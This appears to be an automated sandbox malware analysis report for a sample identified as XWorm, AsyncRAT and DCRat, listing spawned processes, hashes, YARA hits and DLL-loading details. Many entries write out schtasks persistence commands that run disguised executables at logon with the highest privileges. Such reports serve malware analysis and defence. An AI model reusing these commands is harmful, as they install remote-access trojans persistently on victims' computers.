Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:07:02
Start date:	11/06/2024
Path:	C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe"
Imagebase:	0x400000
File size:	4'012'544 bytes
MD5 hash:	57D593692C8428B66ED146E1FAC689B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1703441913.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1703441913.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000000.1684955911.0000000000408000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000000.1684955911.0000000000408000.00000002.00000001.01000000.00000009.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 95%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:07:03
Start date:	11/06/2024
Path:	C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
Imagebase:	0x8d0000
File size:	3'880'844 bytes
MD5 hash:	95D7FC6FAA389C5751DE5C2F88D9580B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 73%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:07:04
Start date:	11/06/2024
Path:	C:\Users\user\AppData\Local\Temp\XClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\XClient.exe"
Imagebase:	0x480000
File size:	34'816 bytes
MD5 hash:	1BE2B217087429A8397F448C9C7B8F8D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	14:07:04
Start date:	11/06/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe"
Imagebase:	0xf40000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:07:05
Start date:	11/06/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\file.vbs"
Imagebase:	0xf40000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:07:12
Start date:	11/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\hUqNkgIMv7nY24UYezK0etl.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:07:12
Start date:	11/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:07:12
Start date:	11/06/2024
Path:	C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe"
Imagebase:	0x2d0000
File size:	3'549'696 bytes
MD5 hash:	7EC6BC11E4B2E409845E3160EC47F5D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1889481824.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1889481824.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1902459797.000000001290D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:07:16
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:07:16
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:07:16
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:07:16
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:07:16
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:07:16
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:07:16
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:07:16
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:07:17
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 8 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:07:17
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	14:07:17
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:07:17
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	14:07:17
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\user\SendTo\sihost.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:07:17
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\user\SendTo\sihost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	14:07:17
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Users\user\SendTo\sihost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:07:17
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	14:07:17
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	14:07:17
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	14:07:17
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	14:07:17
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	14:07:17
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	14:07:18
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	14:07:18
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	14:07:18
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	14:07:18
Start date:	11/06/2024
Path:	C:\Program Files (x86)\jDownloader\config\conhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\jdownloader\config\conhost.exe"
Imagebase:	0x950000
File size:	3'549'696 bytes
MD5 hash:	7EC6BC11E4B2E409845E3160EC47F5D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.1976381139.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	14:07:18
Start date:	11/06/2024
Path:	C:\Program Files (x86)\jDownloader\config\conhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\jdownloader\config\conhost.exe"
Imagebase:	0x30000
File size:	3'549'696 bytes
MD5 hash:	7EC6BC11E4B2E409845E3160EC47F5D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.1958522017.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	14:07:18
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	14:07:18
Start date:	11/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	14:07:19
Start date:	11/06/2024
Path:	C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
Imagebase:	0x180000
File size:	3'549'696 bytes
MD5 hash:	7EC6BC11E4B2E409845E3160EC47F5D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.1997852879.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.1997852879.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 88%, ReversingLabs
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	30.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	31

Executed Functions

Function 00007FF7C018DC4C Relevance: 154.6, APIs: 22, Strings: 66, Instructions: 610
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32 ref: 00007FF7C018DCA3
LoadLibraryW.KERNELBASE ref: 00007FF7C018DDC3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018DE79
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018DE7F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018DE85
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018DE8B
GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF7C018DEDC
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF7C018DEF4
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF7C018DF21

Strings

cryptui.dll, xrefs: 00007FF7C018E067
WindowsCodecs.dll, xrefs: 00007FF7C018E0D7
slc.dll, xrefs: 00007FF7C018E101
usp10.dll, xrefs: 00007FF7C018DFA2
rsaenh.dll, xrefs: 00007FF7C018DF6B
lpk.dll, xrefs: 00007FF7C018DF97
dfscli.dll, xrefs: 00007FF7C018E1B7
dhcpcsvc6.dll, xrefs: 00007FF7C018E1E1
sfc_os.dll, xrefs: 00007FF7C018DF55
apphelp.dll, xrefs: 00007FF7C018E013
atl.dll, xrefs: 00007FF7C018DFFA
version.dll, xrefs: 00007FF7C018DF3F
psapi.dll, xrefs: 00007FF7C018DFD9
dsrole.dll, xrefs: 00007FF7C018E243
msasn1.dll, xrefs: 00007FF7C018E059
SetDllDirectoryW, xrefs: 00007FF7C018DEEA
uxtheme.dll, xrefs: 00007FF7C018E531
netapi32.dll, xrefs: 00007FF7C018E02F
dhcpcsvc.dll, xrefs: 00007FF7C018E1EF
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00007FF7C018E5FF
samlib.dll, xrefs: 00007FF7C018E19B
SetDefaultDllDirectories, xrefs: 00007FF7C018DF17
setupapi.dll, xrefs: 00007FF7C018E005
clbcatq.dll, xrefs: 00007FF7C018DFAD
linkinfo.dll, xrefs: 00007FF7C018E20B
SSPICLI.DLL, xrefs: 00007FF7C018DF60
devrtl.dll, xrefs: 00007FF7C018E163
WINNSI.DLL, xrefs: 00007FF7C018E139
wintrust.dll, xrefs: 00007FF7C018E075
secur32.dll, xrefs: 00007FF7C018E091
rasadhlp.dll, xrefs: 00007FF7C018E1D3
oleaccrc.dll, xrefs: 00007FF7C018E0AD
cscapi.dll, xrefs: 00007FF7C018E0F3
ntshrui.dll, xrefs: 00007FF7C018DFEF
browcli.dll, xrefs: 00007FF7C018E1C5
ws2_32.dll, xrefs: 00007FF7C018DFC3
ntmarta.dll, xrefs: 00007FF7C018E0BB
netutils.dll, xrefs: 00007FF7C018E147
shdocvw.dll, xrefs: 00007FF7C018E03D
DXGIDebug.dll, xrefs: 00007FF7C018DF4A, 00007FF7C018E47A
shell32.dll, xrefs: 00007FF7C018E083
srvcli.dll, xrefs: 00007FF7C018E0E5
RpcRtRemote.dll, xrefs: 00007FF7C018E227
dnsapi.DLL, xrefs: 00007FF7C018E11D
iphlpapi.DLL, xrefs: 00007FF7C018E12B
mpr.dll, xrefs: 00007FF7C018E155
userenv.dll, xrefs: 00007FF7C018E021
kernel32, xrefs: 00007FF7C018DED5
ieframe.dll, xrefs: 00007FF7C018DFE4
XmlLite.dll, xrefs: 00007FF7C018E1FD
profapi.dll, xrefs: 00007FF7C018E0C9
mlang.dll, xrefs: 00007FF7C018E17F
UXTheme.dll, xrefs: 00007FF7C018DF76
dwmapi.dll, xrefs: 00007FF7C018DF81, 00007FF7C018E525
cabinet.dll, xrefs: 00007FF7C018E09F
propsys.dll, xrefs: 00007FF7C018E171
comres.dll, xrefs: 00007FF7C018DFB8
ws2help.dll, xrefs: 00007FF7C018DFCE
cryptbase.dll, xrefs: 00007FF7C018DF8C
wkscli.dll, xrefs: 00007FF7C018E1A9
imageres.dll, xrefs: 00007FF7C018E10F
cryptsp.dll, xrefs: 00007FF7C018E219
peerdist.dll, xrefs: 00007FF7C018E251
crypt32.dll, xrefs: 00007FF7C018E04B
aclui.dll, xrefs: 00007FF7C018E235
samcli.dll, xrefs: 00007FF7C018E18D

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
